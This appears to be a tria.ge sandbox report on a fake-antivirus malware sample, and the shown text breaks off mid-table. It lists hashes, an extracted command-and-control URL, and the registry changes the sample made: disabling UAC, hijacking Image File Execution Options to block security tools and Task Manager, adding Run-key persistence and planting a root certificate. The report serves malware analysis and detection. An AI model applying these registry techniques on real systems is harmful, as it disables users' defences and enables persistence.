Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
10/08/2024, 22:58
Static task
static1
Behavioral task
behavioral1
Sample
8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe
-
Size
2.0MB
-
MD5
8803b11dfdd25468983d1d2f9ff97f14
-
SHA1
ddbfe075d202f0eb40643fc989258f06e0a4ee0f
-
SHA256
525d10cdb850eec48d493440924e00fea92722bfb3f8ccb34e2c3bac768d76ab
-
SHA512
017ead1ddc34515c9fe67a7ac4aa8da142f12c2453c8af0aa52604b893bc8379d77acba7457bd42159707d06a01b8b297b08ffac325eddef2e8ff88b246c4382
-
SSDEEP
49152:DyqU/32OZXgeL+9yX9MyJiCkFhSp1BRjbzQh7LHQjr//Wk:DkRX+cXF/jXBNbG7Lwd
Malware Config
Extracted
http://galaint.online-secure-pay.info/?0=154&1=0&2=1&3=24&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=spwmsjcvew&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-nua.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-nua.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-nua.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ollydbg.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svc.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmon016.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\doors.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mghtml.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blackd.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssupdat.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navlu32.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbwin9x.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcc32.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_avpcc.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\escanv95.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\findviru.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\init.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jdbgmrg.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lordpe.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cwnb181.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\defwatch.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rscdwld.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDInProcPatch.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win-bugsfix.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moolive.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\persfw.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwupd.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moolive.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwatson.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\supporter5.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwebupw.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notstart.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUNMain.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup_flowprotector_us.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashPopWz.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avciman.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgupd.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpf202en.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootconf.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sperm.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tapinstall.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netscanpro.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tds-3.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswChLic.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdfvwiz.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ethereal.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\licmgr.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msdos.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tgbob.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsisetup.exe\Debugger = "svchost.exe" Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\Users\\Admin\\AppData\\Local\\Protector-nua.exe task" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\agentw.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fch32.exe Protector-nua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intren.exe\Debugger = "svchost.exe" Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95_0.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFSrv.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfd.exe Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gbpoll.exe Protector-nua.exe -
Executes dropped EXE 3 IoCs
pid Process 2764 temp.exe 2684 filesystemscan.exe 2928 Protector-nua.exe -
Loads dropped DLL 7 IoCs
pid Process 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 2764 temp.exe 2764 temp.exe 2684 filesystemscan.exe 2684 filesystemscan.exe 2928 Protector-nua.exe 2928 Protector-nua.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Local\\Protector-nua.exe" Protector-nua.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-nua.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-nua.exe File opened for modification C:\Windows\SysWOW64\services.msc Protector-nua.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-nua.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2988 sc.exe 2528 sc.exe 2860 sc.exe 1144 sc.exe 792 sc.exe 1516 sc.exe 1972 sc.exe 1464 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language temp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language filesystemscan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Protector-nua.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "429492573" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-nua.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f8e41e3384fa749ac47329e409d99090000000002000000000010660000000100002000000067aa83ee1748191040b96ab3c31855d131fcbccfc239d8dce1acf860400a3db3000000000e8000000002000020000000eed2cf1451df896a7f94e897c924493246afb6999100c962ba8224a8fdb453ab2000000010cc6f8a7a7588fbbabf0bfdced428531721bcdb0338d76bb2dcbbddd06f13174000000026e16921d12368d151ec9cb66c8ead0d0f49a90ef631b3b4e057f4fd7a6766a74fe2f67f99b7e533727cb831c3777554f03377d96860e3457d8b5512f5983463 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main Protector-nua.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f8e41e3384fa749ac47329e409d9909000000000200000000001066000000010000200000006052b202b6ae67666bdce54881855a63fb9d7f0dace44e79e151cc7bb708f1d6000000000e8000000002000020000000d548359e8f5c5437e97260b5125b099b57cc17a2615e18cf9df16ba687d08593900000008ad13f895288d83f8cd27606e656a862424880cc230953c67c1a6302c2a7c117d640fb7f219d842098626e367ea42b29d770194727667b095a2727b951710b92da679739444afe7544f85656b43c8c20c3f154a03a3c60301f7bc402ebc42718ea093f2d2031e402411a13c73c85757ef49e7157c8d209610581082a01ba10e419952316ebead41a70dc0d9d96154d0d4000000015be85119f8552a0c9a1141dd62e787aecd16ffcb262f469515b8570c0453d03353cff53313afcba38c8b3c394af801c8ea4af9363ef6d9e8962a83b6e4baa65 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-nua.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0CB43D71-576C-11EF-82B5-E297BF49BD91} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 207d1de178ebda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Protector-nua.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Protector-nua.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 1596 iexplore.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2684 filesystemscan.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 2928 Protector-nua.exe 1596 iexplore.exe 1596 iexplore.exe 680 IEXPLORE.EXE 680 IEXPLORE.EXE 680 IEXPLORE.EXE 680 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2660 wrote to memory of 2764 2660 8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe 31 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2764 wrote to memory of 2684 2764 temp.exe 32 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2928 2684 filesystemscan.exe 33 PID 2684 wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2684 wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2684 wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2684 wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2684 